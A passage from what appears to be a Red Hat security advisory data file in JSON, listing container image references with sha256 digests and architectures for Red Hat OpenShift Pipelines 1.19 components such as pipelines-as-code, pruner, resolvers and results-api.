"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
